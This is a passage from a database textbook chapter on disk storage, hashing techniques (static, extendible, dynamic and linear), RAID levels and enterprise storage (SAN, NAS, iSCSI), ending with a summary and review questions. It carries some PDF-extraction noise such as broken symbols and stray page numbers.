resolved by plac- ing the new record in an unused overflow location and setting the pointer of the occupied hash address location to the address of that overflow location. 9A detailed discussion of hashing functions is outside the scope of our presentation. 613 Disk Storage, Basic File Structures, and Hashing A linked list of overflow records for each hash address is thus maintained, as shown in Figure 8(b). ■ Multiple hashing. The program applies a second hash function if the first results in a collision. If another collision results, the program uses open addressing or applies a third hash function and then uses open addressing if necessary. Each collision resolution method requires its own algorithms for insertion, retrieval, and deletion of records. The algorithms for chaining are the simplest. Deletion algorithms for open addressing are rather tricky. Data structures textbooks discuss internal hashing algorithms in more detail. The goal of a good hashing function is to distribute the records uniformly over the address space so as to minimize collisions while not leaving many unused locations. Simulation and analysis studies have shown that it is usually best to keep a hash table between 70 and 90 percent full so that the number of collisions remains low and we do not waste too much space. Hence, if we expect to have r records to store in the table, we should choose M locations for the address space such that (r/M) is between 0.7 and 0.9. It may also be useful to choose a prime number for M, since it has been demonstrated that this distributes the hash addresses better over the address space when the mod hashing function is used. Other hash functions may require M to be a power of 2. 8.2 External Hashing for Disk Files Hashing for disk files is called external hashing. To suit the characteristics of disk storage, the target address space is made of buckets, each of which holds multiple records. A bucket is either one disk block or a cluster of contiguous disk blocks. The hashing function maps a key into a relative bucket number, rather than assigning an absolute block address to the bucket. A table maintained in the file header converts the bucket number into the corresponding disk block address, as illustrated in Figure 9. The collision problem is less severe with buckets, because as many records as will fit in a bucket can hash to the same bucket without causing problems. However, we must make provisions for the case where a bucket is filled to capacity and a new record being inserted hashes to that bucket. We can use a variation of chaining in which a pointer is maintained in each bucket to a linked list of overflow records for the bucket, as shown in Figure 10. The pointers in the linked list should be record pointers, which include both a block address and a relative record position within the block. Hashing provides the fastest possible access for retrieving an arbitrary record given the value of its hash field. Although most good hash functions do not maintain records in order of hash field values, some functions—called order preserving— do. A simple example of an order preserving hash function is to take the leftmost three digits of an invoice number field that yields a bucket address as the hash address and keep the records sorted by invoice number within each bucket. Another 614 Disk Storage, Basic File Structures, and Hashing 0 1 2 M – 2 M – 1 Bucket Number Block address on disk Figure 9 Matching bucket numbers to disk block addresses. example is to use an integer hash key directly as an index to a relative file, if the hash key values fill up a particular interval; for example, if employee numbers in a com- pany are assigned as 1, 2, 3, ... up to the total number of employees, we can use the identity hash function that maintains order. Unfortunately, this only works if keys are generated in order by some application. The hashing scheme described so far is called static hashing because a fixed number of buckets M is allocated. This can be a serious drawback for dynamic files. Suppose that we allocate M buckets for the address space and let m be the maximum number of records that can fit in one bucket; then at most (m * M) records will fit in the allo- cated space. If the number of records turns out to be substantially fewer than (m * M), we are left with a lot of unused space. On the other hand, if the number of records increases to substantially more than (m * M), numerous collisions will result and retrieval will be slowed down because of the long lists of overflow records. In either case, we may have to change the number of blocks M allocated and then use a new hashing function (based on the new value of M) to redistribute the records. These reorganizations can be quite time-consuming for large files. Newer dynamic file organizations based on hashing allow the number of buckets to vary dynamically with only localized reorganization (see Section 8.3). When using external hashing, searching for a record given a value of some field other than the hash field is as expensive as in the case of an unordered file. Record deletion can be implemented by removing the record from its bucket. If the bucket has an overflow chain, we can move one of the overflow records into the bucket to replace the deleted record. If the record to be deleted is already in overflow, we sim- ply remove it from the linked list. Notice that removing an overflow record implies that we should keep track of empty positions in overflow. This is done easily by maintaining a linked list of unused overflow locations. 615 Disk Storage, Basic File Structures, and Hashing Bucket 0 Main buckets Overflow buckets 340 460 Record pointer NULL NULL NULL Bucket 1 321 761 91 Record pointer 981 182 Record pointer (Pointers are to records within the overflow blocks) Record pointer Record pointer 652 Record pointer Record pointer Record pointer Bucket 2 22 72 522 Record pointer Bucket 9 399 89 Record pointer NULL ... Figure 10 Handling overflow for buckets by chaining. Modifying a specific record’s field value depends on two factors: the search condi- tion to locate that specific record and the field to be modified. If the search condi- tion is an equality comparison on the hash field, we can locate the record efficiently by using the hashing function; otherwise, we must do a linear search. A nonhash field can be modified by changing the record and rewriting it in the same bucket. Modifying the hash field means that the record can move to another bucket, which requires deletion of the old record followed by insertion of the modified record. 8.3 Hashing Techniques That Allow Dynamic File Expansion A major drawback of the static hashing scheme just discussed is that the hash address space is fixed. Hence, it is difficult to expand or shrink the file dynamically. The schemes described in this section attempt to remedy this situation. The first scheme—extendible hashing—stores an access structure in addition to the file, and 616 Disk Storage, Basic File Structures, and Hashing hence is somewhat similar to indexing. The main difference is that the access struc- ture is based on the values that result after application of the hash function to the search field. In indexing, the access structure is based on the values of the search field itself. The second technique, called linear hashing, does not require additional access structures. Another scheme, called dynamic hashing, uses an access structure based on binary tree data structures.. These hashing schemes take advantage of the fact that the result of applying a hash- ing function is a nonnegative integer and hence can be represented as a binary num- ber. The access structure is built on the binary representation of the hashing function result, which is a string of bits. We call this the hash value of a record. Records are distributed among buckets based on the values of the leading bits in their hash values. Extendible Hashing. In extendible hashing, a type of directory—an array of 2d bucket addresses—is maintained, where d is called the global depth of the direc- tory. The integer value corresponding to the first (high-order) d bits of a hash value is used as an index to the array to determine a directory entry, and the address in that entry determines the bucket in which the corresponding records are stored. However, there does not have to be a distinct bucket for each of the 2d directory locations. Several directory locations with the same first d� bits for their hash values may contain the same bucket address if all the records that hash to these locations fit in a single bucket. A local depth d��—stored with each bucket—specifies the number of bits on which the bucket contents are based. Figure 11 shows a directory with global depth d = 3. The value of d can be increased or decreased by one at a time, thus doubling or halv- ing the number of entries in the directory array. Doubling is needed if a bucket, whose local depth d� is equal to the global depth d, overflows. Halving occurs if d >
d� for all the buckets after some deletions occur. Most record retrievals require two
block accesses—one to the directory and the other to the bucket.

To illustrate bucket splitting, suppose that a new inserted record causes overflow in
the bucket whose hash values start with 01—the third bucket in Figure 11. The
records will be distributed between two buckets: the first contains all records whose
hash values start with 010, and the second all those whose hash values start with
011. Now the two directory locations for 010 and 011 point to the two new distinct
buckets. Before the split, they pointed to the same bucket. The local depth d� of the
two new buckets is 3, which is one more than the local depth of the old bucket.

If a bucket that overflows and is split used to have a local depth d�equal to the global
depth d of the directory, then the size of the directory must now be doubled so that
we can use an extra bit to distinguish the two new buckets. For example, if the
bucket for records whose hash values start with 111 in Figure 11 overflows, the two
new buckets need a directory with global depth d = 4, because the two buckets are
now labeled 1110 and 1111, and hence their local depths are both 4. The directory
size is hence doubled, and each of the other original locations in the directory is also

617

Disk Storage, Basic File Structures, and Hashing

Global depth
d = 3

000

001

010

011

100

101

110

111

d´ = 3 Bucket for records
whose hash values
start with 000

Directory Data file buckets
Local depth of
each bucket

d´ = 3 Bucket for records
whose hash values
start with 001

d´ = 2 Bucket for records
whose hash values
start with 01

d´ = 2 Bucket for records
whose hash values
start with 10

d´ = 3 Bucket for records
whose hash values
start with 110

d´ = 3 Bucket for records
whose hash values
start with 111

Figure 11
Structure of the
extendible hashing
scheme.

split into two locations, both of which have the same pointer value as did the origi-
nal location.

The main advantage of extendible hashing that makes it attractive is that the per-
formance of the file does not degrade as the file grows, as opposed to static external
hashing where collisions increase and the corresponding chaining effectively

618

Disk Storage, Basic File Structures, and Hashing

increases the average number of accesses per key. Additionally, no space is allocated
in extendible hashing for future growth, but additional buckets can be allocated
dynamically as needed. The space overhead for the directory table is negligible. The
maximum directory size is 2k, where k is the number of bits in the hash value.
Another advantage is that splitting causes minor reorganization in most cases, since
only the records in one bucket are redistributed to the two new buckets. The only
time reorganization is more expensive is when the directory has to be doubled (or
halved). A disadvantage is that the directory must be searched before accessing the
buckets themselves, resulting in two block accesses instead of one in static hashing.
This performance penalty is considered minor and thus the scheme is considered
quite desirable for dynamic files.

Dynamic Hashing. A precursor to extendible hashing was dynamic hashing, in
which the addresses of the buckets were either the n high-order bits or n − 1 high-
order bits, depending on the total number of keys belonging to the respective
bucket. The eventual storage of records in buckets for dynamic hashing is somewhat
similar to extendible hashing. The major difference is in the organization of the
directory. Whereas extendible hashing uses the notion of global depth (high-order d
bits) for the flat directory and then combines adjacent collapsible buckets into a
bucket of local depth d − 1, dynamic hashing maintains a tree-structured directory
with two types of nodes:

■ Internal nodes that have two pointers—the left pointer corresponding to the
0 bit (in the hashed address) and a right pointer corresponding to the 1 bit.

■ Leaf nodes—these hold a pointer to the actual bucket with records.

An example of the dynamic hashing appears in Figure 12. Four buckets are shown
(“000”, “001”, “110”, and “111”) with high-order 3-bit addresses (corre-sponding to
the global depth of 3), and two buckets (“01” and “10” ) are shown with high-order
2-bit addresses (corresponding to the local depth of 2). The latter two are the result
of collapsing the “010” and “011” into “01” and collapsing “100” and “101” into “10”.
Note that the directory nodes are used implicitly to determine the “global” and
“local” depths of buckets in dynamic hashing. The search for a record given the
hashed address involves traversing the directory tree, which leads to the bucket
holding that record. It is left to the reader to develop algorithms for insertion, dele-
tion, and searching of records for the dynamic hashing scheme.

Linear Hashing. The idea behind linear hashing is to allow a hash file to expand
and shrink its number of buckets dynamically without needing a directory. Suppose
that the file starts with M buckets numbered 0, 1, …, M − 1 and uses the mod hash
function h(K) = K mod M; this hash function is called the initial hash function hi.
Overflow because of collisions is still needed and can be handled by maintaining
individual overflow chains for each bucket. However, when a collision leads to an
overflow record in any file bucket, the first bucket in the file—bucket 0—is split into
two buckets: the original bucket 0 and a new bucket M at the end of the file. The
records originally in bucket 0 are distributed between the two buckets based on a
different hashing function hi+1(K) = K mod 2M. A key property of the two hash

619

Disk Storage, Basic File Structures, and Hashing

Data File Buckets

Bucket for records
whose hash values
start with 000

Bucket for records
whose hash values
start with 001

Bucket for records
whose hash values
start with 01

Bucket for records
whose hash values
start with 10

Bucket for records
whose hash values
start with 110

Bucket for records
whose hash values
start with 111

Directory
0

1

0

1

0

1

0

1

0

1

internal directory node

leaf directory node

Figure 12
Structure of the dynamic hashing scheme.

functions hi and hi+1 is that any records that hashed to bucket 0 based on hi will hash
to either bucket 0 or bucket M based on hi+1; this is necessary for linear hashing to
work.

As further collisions lead to overflow records, additional buckets are split in the
linear order 1, 2, 3, …. If enough overflows occur, all the original file buckets 0, 1, …,
M − 1 will have been split, so the file now has 2M instead of M buckets, and all buck-
ets use the hash function hi+1. Hence, the records in overflow are eventually redis-
tributed into regular buckets, using the function hi+1 via a delayed split of their
buckets. There is no directory; only a value n—which is initially set to 0 and is incre-
mented by 1 whenever a split occurs—is needed to determine which buckets have
been split. To retrieve a record with hash key value K, first apply the function hi to K;
if hi(K) < n, then apply the function hi+1 on K because the bucket is already split. Initially, n = 0, indicating that the function hi applies to all buckets; n grows linearly as buckets are split. 620 Disk Storage, Basic File Structures, and Hashing When n = M after being incremented, this signifies that all the original buckets have been split and the hash function hi+1 applies to all records in the file. At this point, n is reset to 0 (zero), and any new collisions that cause overflow lead to the use of a new hashing function hi+2(K) = K mod 4M. In general, a sequence of hashing func- tions hi+j(K) = K mod (2 jM) is used, where j = 0, 1, 2, ...; a new hashing function hi+j+1 is needed whenever all the buckets 0, 1, ..., (2 jM) − 1 have been split and n is reset to 0. The search for a record with hash key value K is given by Algorithm 3. Splitting can be controlled by monitoring the file load factor instead of by splitting whenever an overflow occurs. In general, the file load factor l can be defined as l = r/(bfr * N), where r is the current number of file records, bfr is the maximum num- ber of records that can fit in a bucket, and N is the current number of file buckets. Buckets that have been split can also be recombined if the load factor of the file falls below a certain threshold. Blocks are combined linearly, and N is decremented appropriately. The file load can be used to trigger both splits and combinations; in this manner the file load can be kept within a desired range. Splits can be triggered when the load exceeds a certain threshold—say, 0.9—and combinations can be trig- gered when the load falls below another threshold—say, 0.7. The main advantages of linear hashing are that it maintains the load factor fairly constantly while the file grows and shrinks, and it does not require a directory.10 Algorithm 3. The Search Procedure for Linear Hashing if n = 0 then m ← hj (K) (* m is the hash value of record with hash key K *) else begin m ← hj (K); if m < n then m ← hj+1 (K) end; search the bucket whose hash value is m (and its overflow, if any); 9 Other Primary File Organizations 9.1 Files of Mixed Records The file organizations we have studied so far assume that all records of a particular file are of the same record type. The records could be of EMPLOYEEs, PROJECTs, STUDENTs, or DEPARTMENTs, but each file contains records of only one type. In most database applications, we encounter situations in which numerous types of entities are interrelated in various ways. Relationships among records in various files can be represented by connecting fields.11 For example, a STUDENT record can have a connecting field Major_dept whose value gives the name of the DEPARTMENT 10For details of insertion and deletion into Linear hashed files, refer to Litwin (1980) and Salzberg (1988). 11The concept of foreign keys in the relational data model and references among objects in object-oriented models are examples of connecting fields. 621 Disk Storage, Basic File Structures, and Hashing in which the student is majoring. This Major_dept field refers to a DEPARTMENT entity, which should be represented by a record of its own in the DEPARTMENT file. If we want to retrieve field values from two related records, we must retrieve one of the records first. Then we can use its connecting field value to retrieve the related record in the other file. Hence, relationships are implemented by logical field refer- ences among the records in distinct files. File organizations in object DBMSs, as well as legacy systems such as hierarchical and network DBMSs, often implement relationships among records as physical relationships realized by physical contiguity (or clustering) of related records or by physical pointers. These file organizations typically assign an area of the disk to hold records of more than one type so that records of different types can be physically clustered on disk. If a particular relationship is expected to be used fre- quently, implementing the relationship physically can increase the system’s effi- ciency at retrieving related records. For example, if the query to retrieve a DEPARTMENT record and all records for STUDENTs majoring in that department is frequent, it would be desirable to place each DEPARTMENT record and its cluster of STUDENT records contiguously on disk in a mixed file. The concept of physical clustering of object types is used in object DBMSs to store related objects together in a mixed file. To distinguish the records in a mixed file, each record has—in addition to its field values—a record type field, which specifies the type of record. This is typically the first field in each record and is used by the system software to determine the type of record it is about to process. Using the catalog information, the DBMS can deter- mine the fields of that record type and their sizes, in order to interpret the data val- ues in the record. 9.2 B-Trees and Other Data Structures as Primary Organization Other data structures can be used for primary file organizations. For example, if both the record size and the number of records in a file are small, some DBMSs offer the option of a B-tree data structure as the primary file organization. In general, any data structure that can be adapted to the characteristics of disk devices can be used as a primary file organization for record placement on disk. Recently, column-based stor- age of data has been proposed as a primary method for storage of relations in rela- tional databases. 10 Parallelizing Disk Access Using RAID Technology With the exponential growth in the performance and capacity of semiconductor devices and memories, faster microprocessors with larger and larger primary mem- ories are continually becoming available. To match this growth, it is natural to 622 Disk Storage, Basic File Structures, and Hashing (a) Disk 0 A0 | A4 B0 | B4 Disk 1 A1 | A5 B1 | B5 Disk 2 A2 | A6 B2 | B6 Disk 3 A3 | A7 B3 | B7 Disk 0 A1 Disk 1 A2 Disk 2 A3 Disk 3 A4 A0 | A1 | A2 | A3 | A4 | A5 | A6 | A7 B0 | B1 | B2 | B3 | B4 | B5 | B6 | B7 Data Block A1 File A: (b) Block A2 Block A3 Block A4 Figure 13 Striping of data across multiple disks. (a) Bit-level striping across four disks. (b) Block-level striping across four disks. expect that secondary storage technology must also take steps to keep up with processor technology in performance and reliability. A major advance in secondary storage technology is represented by the develop- ment of RAID, which originally stood for Redundant Arrays of Inexpensive Disks. More recently, the I in RAID is said to stand for Independent. The RAID idea received a very positive industry endorsement and has been developed into an elab- orate set of alternative RAID architectures (RAID levels 0 through 6). We highlight the main features of the technology in this section. The main goal of RAID is to even out the widely different rates of performance improvement of disks against those in memory and microprocessors.12 While RAM capacities have quadrupled every two to three years, disk access times are improving at less than 10 percent per year, and disk transfer rates are improving at roughly 20 percent per year. Disk capacities are indeed improving at more than 50 percent per year, but the speed and access time improvements are of a much smaller magnitude. A second qualitative disparity exists between the ability of special microprocessors that cater to new applications involving video, audio, image, and spatial data pro- cessing, with correspond-ing lack of fast access to large, shared data sets. The natural solution is a large array of small independent disks acting as a single higher-performance logical disk. A concept called data striping is used, which uti- lizes parallelism to improve disk performance. Data striping distributes data trans- parently over multiple disks to make them appear as a single large, fast disk. Figure 13 shows a file distributed or striped over four disks. Striping improves overall I/O performance by allowing multiple I/Os to be serviced in parallel, thus providing high overall transfer rates. Data striping also accomplishes load balancing among disks. Moreover, by storing redundant information on disks using parity or some other error-correction code, reliability can be improved. In Sections 10.1 and 10.2, 12This was predicted by Gordon Bell to be about 40 percent every year between 1974 and 1984 and is now supposed to exceed 50 percent per year. 623 Disk Storage, Basic File Structures, and Hashing we discuss how RAID achieves the two important objectives of improved reliability and higher performance. Section 10.3 discusses RAID organizations and levels. 10.1 Improving Reliability with RAID For an array of n disks, the likelihood of failure is n times as much as that for one disk. Hence, if the MTBF (Mean Time Between Failures) of a disk drive is assumed to be 200,000 hours or about 22.8 years (for the disk drive in Table 1 called Cheetah NS, it is 1.4 million hours), the MTBF for a bank of 100 disk drives becomes only 2,000 hours or 83.3 days (for 1,000 Cheetah NS disks it would be 1,400 hours or 58.33 days). Keeping a single copy of data in such an array of disks will cause a significant loss of reliability. An obvious solution is to employ redundancy of data so that disk failures can be tolerated. The disadvantages are many: additional I/O operations for write, extra computation to maintain redundancy and to do recovery from errors, and additional disk capacity to store redundant information. One technique for introducing redundancy is called mirroring or shadowing. Data is written redundantly to two identical physical disks that are treated as one logical disk. When data is read, it can be retrieved from the disk with shorter queuing, seek, and rotational delays. If a disk fails, the other disk is used until the first is repaired. Suppose the mean time to repair is 24 hours, then the mean time to data loss of a mirrored disk system using 100 disks with MTBF of 200,000 hours each is (200,000)2/(2 * 24) = 8.33 * 10 8 hours, which is 95,028 years.13 Disk mirroring also doubles the rate at which read requests are handled, since a read can go to either disk. The transfer rate of each read, however, remains the same as that for a single disk. Another solution to the problem of reliability is to store extra information that is not normally needed but that can be used to reconstruct the lost information in case of disk failure. The incorporation of redundancy must consider two problems: selecting a technique for computing the redundant information, and selecting a method of distributing the redundant information across the disk array. The first problem is addressed by using error-correcting codes involving parity bits, or specialized codes such as Hamming codes. Under the parity scheme, a redundant disk may be consid- ered as having the sum of all the data in the other disks. When a disk fails, the miss- ing information can be constructed by a process similar to subtraction. For the second problem, the two major approaches are either to store the redundant information on a small number of disks or to distribute it uniformly across all disks. The latter results in better load balancing. The different levels of RAID choose a combination of these options to implement redundancy and improve reliability. 10.2 Improving Performance with RAID The disk arrays employ the technique of data striping to achieve higher transfer rates. Note that data can be read or written only one block at a time, so a typical transfer contains 512 to 8192 bytes. Disk striping may be applied at a finer granularity by 13The formulas for MTBF calculations appear in Chen et al. (1994). 624 Disk Storage, Basic File Structures, and Hashing breaking up a byte of data into bits and spreading the bits to different disks. Thus, bit-level data striping consists of splitting a byte of data and writing bit j to the jth disk. With 8-bit bytes, eight physical disks may be considered as one logical disk with an eightfold increase in the data transfer rate. Each disk participates in each I/O request and the total amount of data read per request is eight times as much. Bit-level striping can be generalized to a number of disks that is either a multiple or a factor of eight. Thus, in a four-disk array, bit n goes to the disk which is (n mod 4). Figure 13(a) shows bit-level striping of data. The granularity of data interleaving can be higher than a bit; for example, blocks of a file can be striped across disks, giving rise to block-level striping. Figure 13(b) shows block-level data striping assuming the data file contains four blocks. With block-level striping, multiple independent requests that access single blocks (small requests) can be serviced in parallel by separate disks, thus decreasing the queuing time of I/O requests. Requests that access multiple blocks (large requests) can be parallelized, thus reducing their response time. In general, the more the number of disks in an array, the larger the potential performance benefit. However, assuming independent failures, the disk array of 100 disks collectively has 1/100th the reliabil- ity of a single disk. Thus, redundancy via error-correcting codes and disk mirroring is necessary to provide reliability along with high performance. 10.3 RAID Organizations and Levels Different RAID organizations were defined based on different combinations of the two factors of granularity of data interleaving (striping) and pattern used to com- pute redundant information. In the initial proposal, levels 1 through 5 of RAID were proposed, and two additional levels—0 and 6—were added later. RAID level 0 uses data striping, has no redundant data, and hence has the best write performance since updates do not have to be duplicated. It splits data evenly across two or more disks. However, its read performance is not as good as RAID level 1, which uses mirrored disks. In the latter, performance improvement is possible by scheduling a read request to the disk with shortest expected seek and rotational delay. RAID level 2 uses memory-style redundancy by using Hamming codes, which contain parity bits for distinct overlapping subsets of components. Thus, in one particular version of this level, three redundant disks suffice for four original disks, whereas with mirroring—as in level 1—four would be required. Level 2 includes both error detection and correction, although detection is generally not required because broken disks identify themselves. RAID level 3 uses a single parity disk relying on the disk controller to figure out which disk has failed. Levels 4 and 5 use block-level data striping, with level 5 dis- tributing data and parity information across all disks. Figure 14(b) shows an illus- tration of RAID level 5, where parity is shown with subscript p. If one disk fails, the missing data is calculated based on the parity available from the remaining disks. Finally, RAID level 6 applies the so-called P + Q redundancy scheme using Reed- Soloman codes to protect against up to two disk failures by using just two redun- dant disks. 625 Disk Storage, Basic File Structures, and Hashing Disk 0 Disk 1 A1 B1 C1 Dp A2 B2 Cp D1 A3 Bp C2 D2 Ap B3 C3 D3 (a) (b) File A File B File C File D File A File B File C File D Figure 14 Some popular levels of RAID. (a) RAID level 1: Mirroring of data on two disks. (b) RAID level 5: Striping of data with distributed parity across four disks. Rebuilding in case of disk failure is easiest for RAID level 1. Other levels require the reconstruction of a failed disk by reading multiple disks. Level 1 is used for critical applications such as storing logs of transactions. Levels 3 and 5 are preferred for large volume storage, with level 3 providing higher transfer rates. Most popular use of RAID technology currently uses level 0 (with striping), level 1 (with mirroring), and level 5 with an extra drive for parity. A combination of multiple RAID levels are also used – for example, 0+1 combines striping and mirroring using a minimum of four disks. Other nonstandard RAID levels include: RAID 1.5, RAID 7, RAID-DP, RAID S or Parity RAID, Matrix RAID, RAID-K, RAID-Z, RAIDn, Linux MD RAID 10, IBM ServeRAID 1E, and unRAID. A discussion of these nonstandard levels is beyond the scope of this text. Designers of a RAID setup for a given application mix have to confront many design decisions such as the level of RAID, the number of disks, the choice of parity schemes, and grouping of disks for block-level striping. Detailed performance studies on small reads and writes (referring to I/O requests for one striping unit) and large reads and writes (referring to I/O requests for one stripe unit from each disk in an error-correction group) have been performed. 11 New Storage Systems In this section, we describe three recent developments in storage systems that are becoming an integral part of most enterprise’s information system architectures. 11.1 Storage Area Networks With the rapid growth of electronic commerce, Enterprise Resource Planning (ERP) systems that integrate application data across organizations, and data ware- houses that keep historical aggregate information, the demand for storage has gone up substantially. For today’s Internet-driven organizations, it has become necessary 626 Disk Storage, Basic File Structures, and Hashing to move from a static fixed data center-oriented operation to a more flexible and dynamic infrastructure for their information processing requirements. The total cost of managing all data is growing so rapidly that in many instances the cost of managing server-attached storage exceeds the cost of the server itself. Furthermore, the procurement cost of storage is only a small fraction—typically, only 10 to 15 percent of the overall cost of storage management. Many users of RAID systems cannot use the capacity effectively because it has to be attached in a fixed manner to one or more servers. Therefore, most large organizations have moved to a concept called storage area networks (SANs). In a SAN, online storage peripherals are con- figured as nodes on a high-speed network and can be attached and detached from servers in a very flexible manner. Several companies have emerged as SAN providers and supply their own proprietary topologies. They allow storage systems to be placed at longer distances from the servers and provide different performance and connectivity options. Existing storage management applications can be ported into SAN configurations using Fiber Channel networks that encapsulate the legacy SCSI protocol. As a result, the SAN-attached devices appear as SCSI devices. Current architectural alternatives for SAN include the following: point-to-point connections between servers and storage systems via fiber channel; use of a fiber channel switch to connect multiple RAID systems, tape libraries, and so on to servers; and the use of fiber channel hubs and switches to connect servers and stor- age systems in different configurations. Organizations can slowly move up from simpler topologies to more complex ones by adding servers and storage devices as needed. We do not provide further details here because they vary among SAN ven- dors. The main advantages claimed include: ■ Flexible many-to-many connectivity among servers and storage devices using fiber channel hubs and switches ■ Up to 10 km separation between a server and a storage system using appro- priate fiber optic cables ■ Better isolation capabilities allowing nondisruptive addition of new periph- erals and servers SANs are growing very rapidly, but are still faced with many problems, such as com- bining storage options from multiple vendors and dealing with evolving standards of storage management software and hardware. Most major companies are evaluat- ing SANs as a viable option for database storage. 11.2 Network-Attached Storage With the phenomenal growth in digital data, particularly generated from multime- dia and other enterprise applications, the need for high-performance storage solu- tions at low cost has become extremely important. Network-attached storage (NAS) devices are among the storage devices being used for this purpose. These devices are, in fact, servers that do not provide any of the common server services, but simply allow the addition of storage for file sharing. NAS devices allow vast 627 Disk Storage, Basic File Structures, and Hashing amounts of hard-disk storage space to be added to a network and can make that space available to multiple servers without shutting them down for maintenance and upgrades. NAS devices can reside anywhere on a local area network (LAN) and may be combined in different configurations. A single hardware device, often called the NAS box or NAS head, acts as the interface between the NAS system and net- work clients. These NAS devices require no monitor, keyboard, or mouse. One or more disk or tape drives can be attached to many NAS systems to increase total capacity. Clients connect to the NAS head rather than to the individual storage devices. An NAS can store any data that appears in the form of files, such as e-mail boxes, Web content, remote system backups, and so on. In that sense, NAS devices are being deployed as a replacement for traditional file servers. NAS systems strive for reliable operation and easy administration. They include built-in features such as secure authentication, or the automatic sending of e-mail alerts in case of error on the device. The NAS devices (or appliances, as some ven- dors refer to them) are being offered with a high degree of scalability, reliability, flexibility, and performance. Such devices typically support RAID levels 0, 1, and 5. Traditional storage area networks (SANs) differ from NAS in several ways. Specifically, SANs often utilize Fiber Channel rather than Ethernet, and a SAN often incorporates multiple network devices or endpoints on a self-contained or private LAN, whereas NAS relies on individual devices connected directly to the existing public LAN. Whereas Windows, UNIX, and NetWare file servers each demand spe- cific protocol support on the client side, NAS systems claim greater operating sys- tem independence of clients. 11.3 iSCSI Storage Systems A new protocol called iSCSI (Internet SCSI) has been proposed recently. It allows clients (called initiators) to send SCSI commands to SCSI storage devices on remote channels. The main advantage of iSCSI is that it does not require the special cabling needed by Fiber Channel and it can run over longer distances using existing network infrastructure. By carrying SCSI commands over IP networks, iSCSI facilitates data transfers over intranets and manages storage over long distances. It can transfer data over local area networks (LANs), wide area networks (WANs), or the Internet. iSCSI works as follows. When a DBMS needs to access data, the operating system generates the appropriate SCSI commands and data request, which then go through encapsulation and, if necessary, encryption procedures. A packet header is added before the resulting IP packets are transmitted over an Ethernet connection. When a packet is received, it is decrypted (if it was encrypted before transmission) and dis- assembled, separating the SCSI commands and request. The SCSI commands go via the SCSI controller to the SCSI storage device. Because iSCSI is bidirectional, the protocol can also be used to return data in response to the original request. Cisco and IBM have marketed switches and routers based on this technology. iSCSI storage has mainly impacted small- and medium-sized businesses because of its combination of simplicity, low cost, and the functionality of iSCSI devices. It allows them not to learn the ins and outs of Fiber Channel (FC) technology and 628 Disk Storage, Basic File Structures, and Hashing instead benefit from their familiarity with the IP protocol and Ethernet hardware. iSCSI implementations in the data centers of very large enterprise businesses are slow in development due to their prior investment in Fiber Channel-based SANs. iSCSI is one of two main approaches to storage data transmission over IP networks. The other method, Fiber Channel over IP (FCIP), translates Fiber Channel control codes and data into IP packets for transmission between geographically distant Fiber Channel storage area networks. This protocol, known also as Fiber Channel tunneling or storage tunneling, can only be used in conjunction with Fiber Channel technology, whereas iSCSI can run over existing Ethernet networks. The latest idea to enter the enterprise IP storage race is Fiber Channel over Ethernet (FCoE), which can be thought of as iSCSI without the IP. It uses many ele- ments of SCSI and FC (just like iSCSI), but it does not include TCP/IP components. This promises excellent performance, especially on 10 Gigabit Ethernet (10GbE), and is relatively easy for vendors to add to their products. 12 Summary We began this chapter by discussing the characteristics of memory hierarchies and then concentrated on secondary storage devices. In particular, we focused on mag- netic disks because they are used most often to store online database files. Data on disk is stored in blocks; accessing a disk block is expensive because of the seek time, rotational delay, and block transfer time. To reduce the average block access time, double buffering can be used when accessing consecutive disk blocks. We presented different ways of storing file records on disk. File records are grouped into disk blocks and can be fixed length or variable length, spanned or unspanned, and of the same record type or mixed types. We discussed the file header, which describes the record formats and keeps track of the disk addresses of the file blocks. Information in the file header is used by system software accessing the file records. Then we presented a set of typical commands for accessing individual file records and discussed the concept of the current record of a file. We discussed how complex record search conditions are transformed into simple search conditions that are used to locate records in the file. Three primary file organizations were then discussed: unordered, ordered, and hashed. Unordered files require a linear search to locate records, but record inser- tion is very simple. We discussed the deletion problem and the use of deletion markers. Ordered files shorten the time required to read records in order of the ordering field. The time required to search for an arbitrary record, given the value of its ordering key field, is also reduced if a binary search is used. However, maintaining the records in order makes insertion very expensive; thus the technique of using an unordered overflow file to reduce the cost of record insertion was discussed. Overflow records are merged with the master file periodically during file reorganization. 629 Disk Storage, Basic File Structures, and Hashing Hashing provides very fast access to an arbitrary record of a file, given the value of its hash key. The most suitable method for external hashing is the bucket technique, with one or more contiguous blocks corresponding to each bucket. Collisions caus- ing bucket overflow are handled by chaining. Access on any nonhash field is slow, and so is ordered access of the records on any field. We discussed three hashing tech- niques for files that grow and shrink in the number of records dynamically: extendible, dynamic, and linear hashing. The first two use the higher-order bits of the hash address to organize a directory. Linear hashing is geared to keep the load factor of the file within a given range and adds new buckets linearly. We briefly discussed other possibilities for primary file organizations, such as B- trees, and files of mixed records, which implement relationships among records of different types physically as part of the storage structure. We reviewed the recent advances in disk technology represented by RAID (Redundant Arrays of Inexpensive (or Independent) Disks), which has become a standard technique in large enterprises to provide better reliability and fault tolerance features in storage. Finally, we reviewed three currently popular options in enterprise storage systems: storage area networks (SANs), network-attached storage (NAS), and iSCSI storage systems. Review Questions 1. What is the difference between primary and secondary storage? 2. Why are disks, not tapes, used to store online database files? 3. Define the following terms: disk, disk pack, track, block, cylinder, sector, interblock gap, read/write head. 4. Discuss the process of disk initialization. 5. Discuss the mechanism used to read data from or write data to the disk. 6. What are the components of a disk block address? 7. Why is accessing a disk block expensive? Discuss the time components involved in accessing a disk block. 8. How does double buffering improve block access time? 9. What are the reasons for having variable-length records? What types of sep- arator characters are needed for each? 10. Discuss the techniques for allocating file blocks on disk. 11. What is the difference between a file organization and an access method? 12. What is the difference between static and dynamic files? 13. What are the typical record-at-a-time operations for accessing a file? Which of these depend on the current file record? 14. Discuss the techniques for record deletion. 630 Disk Storage, Basic File Structures, and Hashing 15. Discuss the advantages and disadvantages of using (a) an unordered file, (b) an ordered file, and (c) a static hash file with buckets and chaining. Which operations can be performed efficiently on each of these organizations, and which operations are expensive? 16. Discuss the techniques for allowing a hash file to expand and shrink dynam- ically. What are the advantages and disadvantages of each? 17. What is the difference between the directories of extendible and dynamic hashing? 18. What are mixed files used for? What are other types of primary file organiza- tions? 19. Describe the mismatch between processor and disk technologies. 20. What are the main goals of the RAID technology? How does it achieve them? 21. How does disk mirroring help improve reliability? Give a quantitative example. 22. What characterizes the levels in RAID organization? 23. What are the highlights of the popular RAID levels 0, 1, and 5? 24. What are storage area networks? What flexibility and advantages do they offer? 25. Describe the main features of network-attached storage as an enterprise storage solution. 26. How have new iSCSI systems improved the applicability of storage area net- works? Exercises 27. Consider a disk with the following characteristics (these are not parameters of any 